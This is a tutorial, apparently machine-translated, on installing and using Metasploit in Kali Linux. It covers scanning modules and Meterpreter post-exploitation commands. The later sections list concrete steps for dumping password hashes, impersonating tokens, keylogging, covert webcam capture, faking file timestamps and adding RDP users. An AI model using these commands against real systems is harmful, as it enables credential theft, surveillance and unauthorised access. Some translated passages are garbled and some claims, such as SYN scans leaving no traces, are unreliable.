Kali's msf penetration test
1. Metasploit introduction, installation, update, directory structure
1.Introduction to metasploit
Metasploit is a vulnerability framework. Its full name is The Metasploit Framework, or MSF for short. It is a free and downloadable framework through which you can easily obtain, develop and attack computer software vulnerabilities. It comes with more than 2000 professional-level vulnerability attack tools with known software vulnerabilities. Metasploit is a vulnerability framework.
2. MSF installation requirements
Hard disk space:
at least 10G, personally recommend 50G; because FAT32 type does not support large file operation when partitioning, it is recommended to use NTFS, EXT3 type partitions,
Memory:
2G and above recommended
Processor: The
processor requirements are low, and computers on the market can meet the requirements, and the processing speed is greater than 500HZ.
Network equipment The
virtual machine can be bridged, or you can configure the IP by yourself. The wireless network needs an external wireless network card
Software:
KALI and other test systems
Virtual machine:
Essential: Kali and various test systems need to be installed
Kali:
Download link: http://www.kali.org/downloads/
Upgrade instruction: "apt-get update && apt-get upgrade"
Metasploitable system:
It contains large and small vulnerabilities in Linux system, which is very suitable for testing system.
Download address: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After downloading, it is found to be in zip format, just unzip it directly and open it with vm.
3. MSF update
1. Replace the yum source and comment out the original source with #.
vi /etc/apt/sources.list
kali
官方源#deb http://http.kali.org/ kali-rolling main non-free contrib
#deb-src http://http.kali.org/ kali-rolling main non-free contrib
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non -free contrib
save and exit
Note (Save-Exit of vi editing)
Press the ESC key to jump to the command mode, and then:
:w save the file but bai does not exit vi
:w file save the changes to the file additionally, du does not exit vi
:w! Force save, no Push out vi
:wq Save the file and exit vi
:wq! Force save the file and exit vi
q: Don’t save the file, exit vi
:q! Don’t save the file, force quit vi
:e! Give up all changes and save from the last time Start to edit the file
2. Add a digital signature
wget archive.kali.org/archive-key.asc //Download the signature
apt-key add archive-key.asc //Install the signature
Note: If you add a digital signature, you can delete it and it says that it cannot be installed. The original msf
root@kali:~# apt remove metasploit-framework
Note: The lock cannot be obtained during the uninstall process /var/cache/apt/archives/lock-open (11: The resource is temporarily unavailable) The
directory /var/cache/ cannot be accessed apt/archives/ lock
root@kali:~# sudo rm /var/cache/apt/archives/lock //Forced unlock
root@kali:~# sudo rm /var/cache/apt/archives/
3. Install the msf framework
root@bogon:~# apt-get update
root@kali:~# apt-get install metasploit-framework // install the msf framework
root@kali:~#msfconsole // find a prompt that the database is not started, exit msf start the database
root@kali:~# systemctl start postgresql //Start the database
root@kali:~# systemctl enable postgresql //Allow self-starting
root@kali:~# msfdb init //Build the database cache
root@kali:~# msfconsole
Note
If you have updated msf occurs only under the problem
root @ kaliew: ~ # msfconsole
[ ] Bundler failed The to the Load and returned the this error:
'CAN not the Load SUCH File - Bundler / Setup'
[ ] by You May need to Uninstall or upgrade Bundler
solution :
Root@kaliew:~# sudo gem install bundler
root@kaliew:~# bundle update celluloid
4. MSF directory structure
MSF is stored in the directory
/opt/MSF under BT5
The storage directory
/usr/share/MSF-framework/ under MSF Kali
Vulnerable framework address
/usr/share/metasploit-framework/
Almost all kinds of modules are here
cd modules
Auxiliary
mainly contains some auxiliary scripts in penetration testing, these script functions include scanning, sniffing, cracking, injection, vulnerability mining, etc.
Encoders
various encoding tools used to evade intrusion detection systems and filtering systems
Exploit
contains exp, 0day, and various exploit scripts. The main attack codes are all here.
Naming rules system/service/module. When using exp, you can follow this naming method to find
such as: use exploites/windows(system)/vnc(service )/realvnc_client(module name)
Nops is
used to bypass IDS IPS and generate scripts
Payloads
are instructions sent by the attacker to the system for execution.
Naming rules: system/type/name such as: use payloads/windows/shell/bind_tcp
payloads are different from exploits: payloads are executed on the target machine, and exploits are executed on the local machine.
The Post
directory stores some functional commands sent to the target machine after the exploits in MSF are successfully executed, such as elevating privileges and obtaining hash
The Data
directory contains tools such as Meterpreter, PassiveX, Vnc, DLLs and some user interface codes, data files used by Msfweb and some other modules.
Plugins
module users need to use load to load and provide plug-ins, such as database connection plug-ins
Most of the files in the Scripts directory are scripts used by the Meterpreter module
tools
contains some useful scripts and scattered tools
2. MSF technical terminology explanation
1.Exploit (penetration attack)
Penetration attacks refer to attacks performed by attackers or penetration testers using security vulnerabilities in systems, applications, or services.
Popular attack techniques include: buffer overflow, web application vulnerability attacks, and the use of configuration errors.
2. Paylod attack payload (attack payload)
The attack is the code that we expect the target system to execute after being penetrated. It can be freely selected, transmitted and implanted in the MSF framework. For example, a reverse shell is an attack payload that creates a network connection from the target host to the attacking host and provides a command-line shell. The bind shell attack payload binds the command line shell to an open listening port on the target host, and the attacker can connect to these ports to obtain shell interaction.
3. Shellcode (overflow code)
Shellcode is a set of machine instructions that run as an attack payload during an infiltration attack. Shellcode is usually written in assembly language. In most cases, the target system will only provide a command line shell or Meterpreter shell after executing the shellcode command. This is also the origin of the shellcode name.
4. Module
In MSF, a module refers to a piece of software code component used in the MSF framework. At some point, you may use an Exploit module, which is a software component used to actually launch an infiltration attack. At other times, an auxiliary module may be used to scan for some attack actions such as scanning or system checkpointing.
5. Listener
The listener is a component in MSF that is used to wait for the connection to the network. For example, after the target host is infiltrated, it may connect back to the attacking host via the Internet, and the listener component waits for the attacked system to connect on the attacking host and is responsible for handling these network connections.
3. MSF basic commands
use? You can browse all commands: Help menu
msfconsole to
open the console
search
search command or module, such as: search ms08-067
Use to
execute commands and use modules, such as: use exploit/windows/smb/ms08_067_netapi
back
to return
info from the current environment to
view module information, Such as: info exploit/windows/smb/ms08_067_netapi
check
detection
banner
displays MSF related information
connect+URL+port
Connect to a host, such as: connect www.baidu.com 80
exit/quit
Exit the console
irb
enter the irb script mode
jobs
display and manage jobs (Same as the task manager in Windows)
kill
ends the job and kills a process (the same as ending the process)
loadpath
loads a module path
load
loads a plug-in
resource
runs the command
route stored in a file to
view a session routing information
Save
save action
set
to variable copy, such as: set RHOST 192.168.1.0
show
shows to all types of modules, such as: show options
setg
assigns a value to a global variable
For example, set to set the IP, it will be used in the RHOST of other modules
sleep
within a defined number of seconds to do nothing
unload
unload a module
unset
solve one or more variables, such as: unset rhost
unsetg
solve one or more global variables
version
display MSF and the console version of the library
4. Exploits and payloads modules
1.exploits module
Naming rule: system/service/name
For example: windows/smb/ms08_067_netapi
RHOST: target host IP address such as: set
rhost 192.168.0.1 RPORT: target host connection port such as: set rport 80
LHOST: attacker's IP address such as: set lhost 192.168.0.1
LPORT: attacker's port such as: set lport 80
Payload : The effective payload, return to the shell after success, such as: set payload windows/meterpreter/bind_tcp
2.payloads module
It is used after using a module.
Naming rule: system/type/name
For example: Windows/dllinject/reverse_tcp
type naming rule
shell: upload a shell.
dllinject: Inject a dll into the process.
patchup***: patch vulnerabilities.
upexec: upload and execute a file.
meterpreter: advanced payload.
vncinject: Advanced payload.
passive: Advanced payload.
Name naming rules
shell_find_tag: create a shell on an established connection.
shell_reverse_tcp: Reverse connection to the attacker's host and create a shell.
bind_tcp: monitor a tcp connection.
reverse_tcp: establish a tcp connection in reverse.
reverse_http: communicate through the HTTP tunnel and create a new user to add to the management group.
add_user: Create a new user and add it to the management group.
xxx_ipv6_tcp: Based on IPV6.
xxx_nonx_tcp: no execute or win7 (NX is a technology applied to the CPU to prevent buffer overflow).
xxx_ord_tcp: Ordered payload.
xxx_tcp_allports: on all possible ports.
5. The simple and basic use process of MSF:
Enter Msfconsole in the kali command window to start MSF
Search + vulnerability number to find the vulnerability, the output result will have the corresponding exploit module of the vulnerability
Use+ vulnerability module to enter the module
Info View related information about the exploit (author information, attackable systems, etc.)
Show options look at those things that need to be set such as attack IP address', port number, etc.
Set Set vulnerabilities according to the information output by show options. Set
such as; set payload, set rhost\rport, set lhost\lport, set target, etc.
Check whether there are vulnerabilities,
Exploit or run, and start the attack to
see the attack effect: session -I has a session Then it succeeds.
6.MSF auxiliary module
1. Auxiliary auxiliary module
1. Whois information detection:
View domain name information
Whois www.baidu.com
View IP information
Whois 192.168.1.100
2. Use the auxiliary module to find the mailbox
use auxiliary/gather/search_email_collector to enter the search mailbox module
show options see what needs to be set
set domain www.baidu.com set a domain name
set search_google false Since Google is blocked in China, it is closed
run
3. Use the DNS enumeration module under the auxiliary module:
use auxiliary/gather/enum_dns to enter the DNS enumeration module
show options see what needs to be set
set domain baidu.com Set a domain name
Note: To set the top-level domain name, do not add www, otherwise it will be xxx.www.baidu.com when blasting
Run
4. Port scanning module
1. Built-in namp scan
Namp -sV 192.168.1.100
2. Syn scan
use auxiliary/scanner/portscan/syn to enter syn scan
show options see what needs to be set
set rhost 192.168.1.100 Set the target address
set threads 100 Set threads (default is 1, here is set to 100)
Run operation
scanning principle: the
scanner sends a SYN packet requesting connection to a port of the target host. After receiving the SYN/ACK, the scanner does not send an ACK response but sends a RST packet to request disconnection. In this way, the three-way handshake is not completed and a normal TCP connection cannot be established. Therefore, this scan will not be recorded in the system log. This scanning technique generally does not leave scanning traces on the target host. However, this scan requires root privileges.
TCP connect port scans the server and the client to establish a successful connection (the target port is open) process:
① Client sends SYN;
② Server returns SYN/ACK, indicating that the port is open;
③ Client returns ACK, indicating that the connection has been established;
④ Client The end actively disconnects.
TCP connect port scans the server and the client to fail to establish a connection (the target port is closed) process:
① The client sends SYN;
② The server returns RST/ACK, indicating that the port is not open.
Port opening:
1. Client sends SYN;
2. Server sends SYN/ACK;
3. Client sends RST to disconnect (only the first two steps are required to determine that the port is open).
Port is closed:
1. Client sends SYN;
2. Server replies with RST (indicating that the port is closed).
Advantages:
SYN scanning is more concealed than TCP Connect() scanning. SYN only needs to send the initial SYN packet to the target host. If the port is open, the corresponding SYN-ACK packet will be responded; if it is closed, it will respond to the RST packet;
3. tcp scan
use auxiliary/scanner/portscan/tcp to enter tcp scan
show options see what needs to be set
set rhost 192.168.1.100 Set the target address
set threads 100 Set threads (default is 1, here is set to 100)
run
5. Service version information detection
1. smb version scan
use auxiliary/scanner/smb/smb_version to enter SMB scan
show options see what needs to be set
set rhost 192.168.1.100 Set the target address
run Run
2...ssh version scan
use auxiliary/scanner/ssh/ssh_version enter ssh version scan
show options see what needs to be set
set rhost 192.168.1.100 Set the target address
set threads 100 Set threads (default is 1, here is set to 100)
run Run
3.ftp version scan
use auxiliary/scanner/ftp/ftp_version enter ftp version scan
show options see what needs to be set
set rhost 192.168.1.100 Set the target address
set threads 100 Set threads (default is 1, here is set to 100)
run
7. How to use meterpreter late attack
1: Upload files to the Windows host.
Simply put, you can upload any file on the machine to the remote target host.
Command:
upload <file> <destination>
Note: Use the -r parameter to upload directories and files recursively. The
correct way to input files is: upload //root//123.exe c:\123.exe
2: Download the file from the windows host. The
download command can download the file on the remote host.
Command:
download <file> <path to save path>
Note: The Windows path should use double slashes.
If we need to recursively download the entire directory including sub For directories and files, we can use the download -r command
3: Execute the exe file on the target host.
We can also use the execute command to execute the application on the target host. The
syntax is also very simple.
Command:
execute -f <path> [options] The
correct writing is: execute -fc://1. exe
4: Create a new channel for CMD
If you want to execute a command prompt on the target host, you can use the following command:
Command:
execute -f cmd -c
5: Display process
ps command will display all running processes on the target host
Command:
ps
6: Get the cmd shell
command of the target host, you can enter the cmd
command of the target host :
shell
7: Obtain the admin authority. The
getsystem command can raise the authority to the local system authority.
Command:
getsystem
8: Use Hashdump to dump all hash values
We can use the meterpreter shell to dump the current system account and password of the target host. The dumped content is in NTML hash format, and there are many tools and techniques on the Internet to crack them.
NTLM online cracking: https://hashkiller.co.uk/ntlm-decrypter.aspx
command: The format of each line of
hashdump
output is as follows
: Username:SID:LM hash:NTLM hash:::
9: Use Credcollect to dump the hash value.
There is a similar script called credential_collector, which can also collect the tokens
command of the target host :
run credcollect
10: Create port forwarding
The portfwd command in the meterpreter shell is one of the most commonly used commands in forwarding technology, allowing the attacking system to access target hosts that cannot be directly accessed.
The add option adds port forwarding to the list and essentially creates a tunnel.
Please note: This tunnel exists outside the meterpreter console and can be used by any terminal session.
Command:
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #forward the 3389 port of the target machine to the local 6666 port
rdesktop 127.0.0.1:6666
11: Delete port forwarding
Similar to the create port forwarding command, this command is to delete a port forwarding record
Command:
portfwd delete -l -p -r
such as: portfwd delete -l 1337 -p 1337 -r 192.168.1.100
If you want to display all port forwarding records, you can use the portfwd list command. If you want to delete all the records, you can use the portfwd flush command.
12: Search for files on the target host. The
search command can locate and find specific files on the target host. This command can search the entire file system or search a specific folder.
For example, if you want to search for all txt files on the target host, you can use the following command:
Command:
search -f *.txt
13: Get user ID The
getuid command will display the user running the meterpreter service on the host.
Command:
getuid
14: Get system information The
sysinfo command will display the system name, operating system, architecture and language.
Command:
sysinfo
15:
The process of simulating any user (token operation) is very helpful for attacking distributed systems like Microsoft Active Directory, because in Microsoft Active Directory, local access permissions are not very useful, but if you can get credentials, especially management Credentials, that would be very useful.
Incognito was originally a standalone application. After you successfully invade the system, you can use it to simulate user tokens. This application was later integrated into metasploit, and finally integrated into the meterpreter, the use is as follows:
loading this module in the meterpreter session is very simple, just enter the use incognito command to
enter list_tokens -u to display all valid tokens
and then we need to simulate a certain token to obtain its permissions. Also note that if a token is successfully simulated, we can use the getuid command to check the current user ID
getuid
use incognito
list_tokens -u
impersonate_token “Machine\user”
16: webcam camera command
webcam_list to view the camera
webcam_snap to take pictures
through the camera webcam_stream to start the video through the camera
17: execute execute file
execute execute file execute in the target machine
execute -H -i -f cmd.exe to create a new process cmd.exe, -H is not visible, -i interactive
18: timestomp fake timestamp
timestomp C:// -h view help
timestomp -v C://2.txt view timestamp
timestomp C://2.txt -f C://1.txt change 1.txt Copy the timestamp to 2.txt
19: enable_rdp script enable 3389
run post/windows/manage/enable_rdp enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 add user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 port 3389 The forwarded to 6662
script is located in /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
through the enable_rdp.rb script, we can see: to open rdp is to modify the registry through reg; to add users is to call cmd.exe through net User added; port forwarding is the portfwd command used
20: Keylogger
keyscan_start start keylogger
keyscan_dump export record data
keyscan_stop end keylogger
For other details, see: https://xz.aliyun.com/t/2536